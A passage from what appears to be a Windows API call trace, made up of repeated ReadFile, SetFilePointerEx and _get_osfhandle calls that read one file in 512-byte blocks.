lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.627] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.627] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.627] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.627] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.627] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.628] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.628] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.628] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.628] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.628] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.628] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.628] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.629] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.629] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.629] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.629] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.629] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.629] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.630] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.630] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.630] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.630] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.630] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.630] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.630] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.630] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.630] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.630] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.630] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.630] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.630] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.631] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.631] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.631] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.631] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.631] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.631] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.631] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.632] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.632] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.632] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.632] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.632] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.632] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.632] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.632] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.632] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.632] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.632] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.632] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.632] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.633] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.633] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.633] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.633] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.633] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.633] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.633] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.633] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.633] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.633] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.633] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.634] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.634] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.634] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.634] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.634] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.634] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.635] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.635] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.635] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.635] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.635] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.635] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.635] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.635] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.635] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.635] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.635] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: 